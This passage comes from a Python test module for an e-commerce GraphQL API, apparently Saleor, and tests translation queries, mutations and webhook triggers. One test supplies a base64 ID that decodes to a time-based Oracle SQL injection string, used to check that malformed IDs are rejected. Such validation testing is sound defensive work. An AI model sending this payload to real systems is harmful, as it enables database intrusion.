                                    language {
                                        code
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    """

    response = user_api_client.post_graphql(query)
    data = get_graphql_content(response)["data"]
    # Mirror test_attribute_value_translation: inspect the last choice of
    # the first attribute.
    attribute_value = data["attributes"]["edges"][0]["node"]["choices"]["edges"][-1][
        "node"
    ]
    assert attribute_value["translation"] is None
def test_shipping_method_no_translation(
    staff_api_client, shipping_method, permission_manage_shipping
):
    """Without a stored translation the shipping-method field resolves to null."""
    gql = """
    query shippingZoneById($shippingZoneId: ID!) {
        shippingZone(id: $shippingZoneId) {
            shippingMethods {
                translation(languageCode: PL) {
                    name
                    language {
                        code
                    }
                }
            }
        }
    }
    """

    variables = {
        "shippingZoneId": graphene.Node.to_global_id(
            "ShippingZone", shipping_method.shipping_zone.id
        )
    }
    response = staff_api_client.post_graphql(
        gql, variables, permissions=[permission_manage_shipping]
    )
    content = get_graphql_content(response)["data"]
    # Local renamed from `shipping_method` so the fixture is not shadowed.
    first_method = content["shippingZone"]["shippingMethods"][0]
    assert first_method["translation"] is None
def test_menu_item_no_translation(user_api_client, menu_item):
    """Without a stored translation the menu-item field resolves to null."""
    gql = """
    query menuItemById($menuItemId: ID!) {
        menuItem(id: $menuItemId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"menuItemId": graphene.Node.to_global_id("MenuItem", menu_item.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["menuItem"]["translation"] is None
def test_shop_no_translation(user_api_client, site_settings):
    """Without a stored translation the shop field resolves to null."""
    gql = """
    query {
        shop {
            translation(languageCode: PL) {
                headerText
                language {
                    code
                }
            }
        }
    }
    """

    content = get_graphql_content(user_api_client.post_graphql(gql))
    assert content["data"]["shop"]["translation"] is None
PRODUCT_TRANSLATE_MUTATION = """
mutation productTranslate($productId: ID!, $input: TranslationInput!) {
productTranslate(id: $productId, languageCode: PL, input: $input) {
product {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    product,
    permission_manage_translations,
    settings,
):
    """Creating a product translation triggers the TRANSLATION_CREATED webhook."""
    # Force the webhook plugin on and make webhook lookup deterministic so
    # the async trigger call can be asserted exactly.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    product_id = graphene.Node.to_global_id("Product", product.id)
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        {"productId": product_id, "input": {"name": "Produkt PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["productTranslate"]
    assert data["product"]["translation"]["name"] == "Produkt PL"
    assert data["product"]["translation"]["language"]["code"] == "PL"
    translation = product.translations.first()
    # freeze_time keeps any timestamps in the payload deterministic.
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    # NOTE(review): the final argument presumably compares equal via the
    # wrapped user (SimpleLazyObject delegation) — confirm if this assertion
    # ever flakes.
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_product_create_translation_for_description(
    staff_api_client, product, permission_manage_translations
):
    """Translating only the description leaves the translated name null."""
    description = dummy_editorjs("description", True)
    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "input": {"description": description},
    }
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    translation = payload["product"]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
def test_product_create_translation_for_description_and_name_as_null(
    staff_api_client, product, permission_manage_translations
):
    """An explicit null name is accepted alongside a description translation."""
    description = dummy_editorjs("description", True)
    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "input": {"description": description, "name": None},
    }
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    translation = payload["product"]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
def test_product_create_translation_with_app(
    app_api_client, product, permission_manage_translations
):
    """App clients with the translations permission can create translations."""
    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "input": {"name": "Produkt PL"},
    }
    response = app_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    assert payload["product"]["translation"]["name"] == "Produkt PL"
    assert payload["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_by_translatable_content_id(
    staff_api_client, product, permission_manage_translations
):
    """A ProductTranslatableContent global ID is accepted in place of a Product ID."""
    content_id = graphene.Node.to_global_id("ProductTranslatableContent", product.id)
    variables = {"productId": content_id, "input": {"name": "Produkt PL"}}
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    assert payload["product"]["translation"]["name"] == "Produkt PL"
    assert payload["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_validates_name_length(
    staff_api_client, product, permission_manage_translations
):
    """An over-long translated name is rejected with an INVALID error."""
    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "input": {"description": None, "name": "Long" * 100},
    }
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    assert payload["product"] is None
    assert payload["errors"] == [
        {"field": "name", "code": "INVALID"},
    ]
def test_product_create_translation_by_invalid_translatable_content_id(
    staff_api_client, product, permission_manage_translations
):
    """A malformed (SQL-injection-style) global ID yields an INVALID id error."""
    # The base64 payload decodes to:
    # ProductTranslatableContent:4913'||
    # DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||
    translatable_content_id = (
        "UHJvZHVjdFRyYW5zbGF0YWJsZUNvbnRlbnQ6NDkxMyd8fERCTVN"
        "fUElQRS5SRUNFSVZFX01FU1NBR0UoQ0hSKDk4KXx8Q0hSKDk4KXx8Q"
        "0hSKDk4KSwxNSl8fA=="
    )
    variables = {"productId": translatable_content_id, "input": {"name": "Produkt PL"}}
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productTranslate"]
    first_error = payload["errors"][0]
    assert first_error["code"] == "INVALID"
    assert first_error["field"] == "id"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    product,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation triggers TRANSLATION_UPDATED."""
    # Force the webhook plugin on and make webhook lookup deterministic.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    # Pre-existing translation distinguishes update from create.
    translation = product.translations.create(language_code="pl", name="Produkt")
    product_id = graphene.Node.to_global_id("Product", product.id)
    response = staff_api_client.post_graphql(
        PRODUCT_TRANSLATE_MUTATION,
        {"productId": product_id, "input": {"name": "Produkt PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["productTranslate"]
    assert data["product"]["translation"]["name"] == "Produkt PL"
    assert data["product"]["translation"]["language"]["code"] == "PL"
    # Reload so the payload reflects the mutated name.
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
PRODUCT_VARIANT_TRANSLATE_MUTATION = """
mutation productVariantTranslate(
$productVariantId: ID!, $input: NameTranslationInput!
) {
productVariantTranslate(
id: $productVariantId, languageCode: PL,
input: $input) {
productVariant {
translation(languageCode: PL) {
name
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_variant_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    variant,
    channel_USD,
    permission_manage_translations,
    settings,
):
    """Creating a variant translation triggers TRANSLATION_CREATED."""
    # Force the webhook plugin on and make webhook lookup deterministic.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
    response = staff_api_client.post_graphql(
        PRODUCT_VARIANT_TRANSLATE_MUTATION,
        {"productVariantId": product_variant_id, "input": {"name": "Wariant PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["productVariantTranslate"]
    assert data["productVariant"]["translation"]["name"] == "Wariant PL"
    assert data["productVariant"]["translation"]["language"]["code"] == "PL"
    translation = variant.translations.first()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    # NOTE(review): uses assert_called_with (last call only), unlike the
    # product tests which use assert_called_once_with — confirm whether the
    # variant flow may legitimately trigger more than one webhook call.
    mocked_webhook_trigger.assert_called_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_product_variant_create_translation_by_translatable_content_id(
    staff_api_client,
    variant,
    channel_USD,
    permission_manage_translations,
):
    """A ProductVariantTranslatableContent ID is accepted for the mutation."""
    content_id = graphene.Node.to_global_id(
        "ProductVariantTranslatableContent", variant.id
    )
    variables = {"productVariantId": content_id, "input": {"name": "Wariant PL"}}
    response = staff_api_client.post_graphql(
        PRODUCT_VARIANT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productVariantTranslate"]
    assert payload["productVariant"]["translation"]["name"] == "Wariant PL"
    assert payload["productVariant"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_variant_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    variant,
    permission_manage_translations,
    settings,
):
    """Updating an existing variant translation triggers TRANSLATION_UPDATED."""
    # Force the webhook plugin on and make webhook lookup deterministic.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    # Pre-existing translation distinguishes update from create.
    translation = variant.translations.create(language_code="pl", name="Wariant")
    product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
    response = staff_api_client.post_graphql(
        PRODUCT_VARIANT_TRANSLATE_MUTATION,
        {"productVariantId": product_variant_id, "input": {"name": "Wariant PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["productVariantTranslate"]
    assert data["productVariant"]["translation"]["name"] == "Wariant PL"
    assert data["productVariant"]["translation"]["language"]["code"] == "PL"
    # Reload so the payload reflects the mutated name.
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    # NOTE(review): assert_called_with checks only the LAST call — see the
    # create-variant test above for the same pattern.
    mocked_webhook_trigger.assert_called_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_product_variant_translation_mutation_validates_inputs_length(
    staff_api_client,
    variant,
    channel_USD,
    permission_manage_translations,
):
    """An over-long variant name is rejected with an INVALID error."""
    content_id = graphene.Node.to_global_id(
        "ProductVariantTranslatableContent", variant.id
    )
    variables = {
        "productVariantId": content_id,
        "input": {"name": "Wariant PL" * 100},
    }
    response = staff_api_client.post_graphql(
        PRODUCT_VARIANT_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["productVariantTranslate"]
    assert payload["productVariant"] is None
    assert payload["errors"] == [
        {
            "field": "name",
            "code": "INVALID",
        }
    ]
COLLECTION_TRANSLATE_MUTATION = """
mutation collectionTranslate($collectionId: ID!, $input: TranslationInput!) {
collectionTranslate(
id: $collectionId, languageCode: PL,
input: $input) {
collection {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_collection_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    published_collection,
    permission_manage_translations,
    settings,
):
    """Creating a collection translation triggers TRANSLATION_CREATED."""
    # Force the webhook plugin on and make webhook lookup deterministic.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        {"collectionId": collection_id, "input": {"name": "Kolekcja PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["collectionTranslate"]
    assert data["collection"]["translation"]["name"] == "Kolekcja PL"
    assert data["collection"]["translation"]["language"]["code"] == "PL"
    translation = published_collection.translations.first()
    # freeze_time keeps any timestamps in the payload deterministic.
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_collection_create_translation_by_translatable_content_id(
    staff_api_client,
    published_collection,
    permission_manage_translations,
):
    """A CollectionTranslatableContent ID is accepted for the mutation."""
    content_id = graphene.Node.to_global_id(
        "CollectionTranslatableContent", published_collection.id
    )
    variables = {"collectionId": content_id, "input": {"name": "Kolekcja PL"}}
    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["collectionTranslate"]
    assert payload["collection"]["translation"]["name"] == "Kolekcja PL"
    assert payload["collection"]["translation"]["language"]["code"] == "PL"
def test_collection_create_translation_for_description(
    staff_api_client, published_collection, permission_manage_translations
):
    """Translating only the description leaves the translated name null."""
    description = dummy_editorjs("description", True)
    variables = {
        "collectionId": graphene.Node.to_global_id(
            "Collection", published_collection.id
        ),
        "input": {"description": description},
    }
    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["collectionTranslate"]
    translation = payload["collection"]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
def test_collection_create_translation_for_description_name_as_null(
    staff_api_client, published_collection, permission_manage_translations
):
    """An explicit null name is accepted alongside a description translation."""
    description = dummy_editorjs("description", True)
    variables = {
        "collectionId": graphene.Node.to_global_id(
            "Collection", published_collection.id
        ),
        "input": {"description": description, "name": None},
    }
    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )
    payload = get_graphql_content(response)["data"]["collectionTranslate"]
    translation = payload["collection"]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_collection_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    published_collection,
    permission_manage_translations,
    settings,
):
    """Updating an existing collection translation triggers TRANSLATION_UPDATED."""
    # Force the webhook plugin on and make webhook lookup deterministic.
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    # Pre-existing translation distinguishes update from create.
    translation = published_collection.translations.create(
        language_code="pl", name="Kolekcja"
    )
    collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        {"collectionId": collection_id, "input": {"name": "Kolekcja PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["collectionTranslate"]
    assert data["collection"]["translation"]["name"] == "Kolekcja PL"
    assert data["collection"]["translation"]["language"]["code"] == "PL"
    # Reload so the payload reflects the mutated name.
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_collection_translation_mutation_validates_inputs_length(
    staff_api_client, published_collection, permission_manage_translations
):
    """An over-long name is rejected with an INVALID error and no collection."""
    too_long_name = "long" * 100  # 400 characters
    variables = {
        "collectionId": graphene.Node.to_global_id(
            "Collection", published_collection.id
        ),
        "input": {
            "description": dummy_editorjs("description", True),
            "name": too_long_name,
        },
    }

    response = staff_api_client.post_graphql(
        COLLECTION_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    data = get_graphql_content(response)["data"]["collectionTranslate"]
    assert data["collection"] is None
    assert data["errors"] == [{"field": "name", "code": "INVALID"}]
CATEGORY_TRANSLATE_MUTATION = """
mutation categoryTranslate($categoryId: ID!, $input: TranslationInput!) {
categoryTranslate(
id: $categoryId, languageCode: PL,
input: $input) {
category {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_category_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    category,
    permission_manage_translations,
    settings,
):
    """Creating a category translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {
        "categoryId": graphene.Node.to_global_id("Category", category.id),
        "input": {"name": "Kategoria PL"},
    }

    # when
    response = staff_api_client.post_graphql(
        CATEGORY_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["categoryTranslate"][
        "category"
    ]["translation"]
    assert translated["name"] == "Kategoria PL"
    assert translated["language"]["code"] == "PL"

    translation = category.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_category_create_translation_by_translatable_content_id(
    staff_api_client,
    category,
    permission_manage_translations,
):
    """The mutation also resolves a CategoryTranslatableContent global ID."""
    node_id = graphene.Node.to_global_id("CategoryTranslatableContent", category.id)
    variables = {"categoryId": node_id, "input": {"name": "Kategoria PL"}}

    response = staff_api_client.post_graphql(
        CATEGORY_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["categoryTranslate"][
        "category"
    ]["translation"]
    assert translation["name"] == "Kategoria PL"
    assert translation["language"]["code"] == "PL"
def test_category_create_translation_for_description(
    staff_api_client, category, permission_manage_translations
):
    """Translating only the description leaves the translated name unset."""
    description = dummy_editorjs("description", True)
    variables = {
        "categoryId": graphene.Node.to_global_id("Category", category.id),
        "input": {"description": description},
    }

    response = staff_api_client.post_graphql(
        CATEGORY_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["categoryTranslate"][
        "category"
    ]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
def test_category_create_translation_for_description_name_as_null(
    staff_api_client, category, permission_manage_translations
):
    """An explicit ``name: null`` alongside a description is accepted."""
    description = dummy_editorjs("description", True)
    variables = {
        "categoryId": graphene.Node.to_global_id("Category", category.id),
        "input": {"name": None, "description": description},
    }

    response = staff_api_client.post_graphql(
        CATEGORY_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["categoryTranslate"][
        "category"
    ]["translation"]
    assert translation["name"] is None
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_category_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    category,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    translation = category.translations.create(language_code="pl", name="Kategoria")
    variables = {
        "categoryId": graphene.Node.to_global_id("Category", category.id),
        "input": {"name": "Kategoria PL"},
    }

    # when
    response = staff_api_client.post_graphql(
        CATEGORY_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["categoryTranslate"][
        "category"
    ]["translation"]
    assert translated["name"] == "Kategoria PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
VOUCHER_TRANSLATE_MUTATION = """
mutation voucherTranslate($voucherId: ID!) {
voucherTranslate(
id: $voucherId, languageCode: PL,
input: {name: "Bon PL"}) {
voucher {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_voucher_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    voucher,
    permission_manage_translations,
    settings,
):
    """Creating a voucher translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {"voucherId": graphene.Node.to_global_id("Voucher", voucher.id)}

    # when
    response = staff_api_client.post_graphql(
        VOUCHER_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["voucherTranslate"][
        "voucher"
    ]["translation"]
    assert translated["name"] == "Bon PL"
    assert translated["language"]["code"] == "PL"

    translation = voucher.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_voucher_create_translation_by_translatable_content_id(
    staff_api_client,
    voucher,
    permission_manage_translations,
):
    """The mutation also resolves a VoucherTranslatableContent global ID."""
    node_id = graphene.Node.to_global_id("VoucherTranslatableContent", voucher.id)

    response = staff_api_client.post_graphql(
        VOUCHER_TRANSLATE_MUTATION,
        {"voucherId": node_id},
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["voucherTranslate"][
        "voucher"
    ]["translation"]
    assert translation["name"] == "Bon PL"
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_voucher_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    voucher,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    # NOTE(review): the initial name "Kategoria" looks copy-pasted from the
    # category tests; it is irrelevant to the assertions, which check the
    # updated value only.
    translation = voucher.translations.create(language_code="pl", name="Kategoria")
    variables = {"voucherId": graphene.Node.to_global_id("Voucher", voucher.id)}

    # when
    response = staff_api_client.post_graphql(
        VOUCHER_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["voucherTranslate"][
        "voucher"
    ]["translation"]
    assert translated["name"] == "Bon PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
SALE_TRANSLATION_MUTATION = """
mutation saleTranslate($saleId: ID!) {
saleTranslate(
id: $saleId, languageCode: PL,
input: {name: "Wyprz PL"}) {
sale {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_sale_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    sale,
    permission_manage_translations,
    settings,
):
    """Creating a sale translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {"saleId": graphene.Node.to_global_id("Sale", sale.id)}

    # when
    response = staff_api_client.post_graphql(
        SALE_TRANSLATION_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["saleTranslate"]["sale"][
        "translation"
    ]
    assert translated["name"] == "Wyprz PL"
    assert translated["language"]["code"] == "PL"

    translation = sale.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_sale_create_translation_by_translatable_content_id(
    staff_api_client,
    sale,
    permission_manage_translations,
):
    """The mutation also resolves a SaleTranslatableContent global ID."""
    node_id = graphene.Node.to_global_id("SaleTranslatableContent", sale.id)

    response = staff_api_client.post_graphql(
        SALE_TRANSLATION_MUTATION,
        {"saleId": node_id},
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["saleTranslate"]["sale"][
        "translation"
    ]
    assert translation["name"] == "Wyprz PL"
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_sale_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    sale,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    translation = sale.translations.create(language_code="pl", name="Sale")
    variables = {"saleId": graphene.Node.to_global_id("Sale", sale.id)}

    # when
    response = staff_api_client.post_graphql(
        SALE_TRANSLATION_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["saleTranslate"]["sale"][
        "translation"
    ]
    assert translated["name"] == "Wyprz PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
PAGE_TRANSLATE_MUTATION = """
mutation pageTranslate($pageId: ID!, $input: PageTranslationInput!) {
pageTranslate(
id: $pageId, languageCode: PL,
input: $input) {
page {
translation(languageCode: PL) {
title
content
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
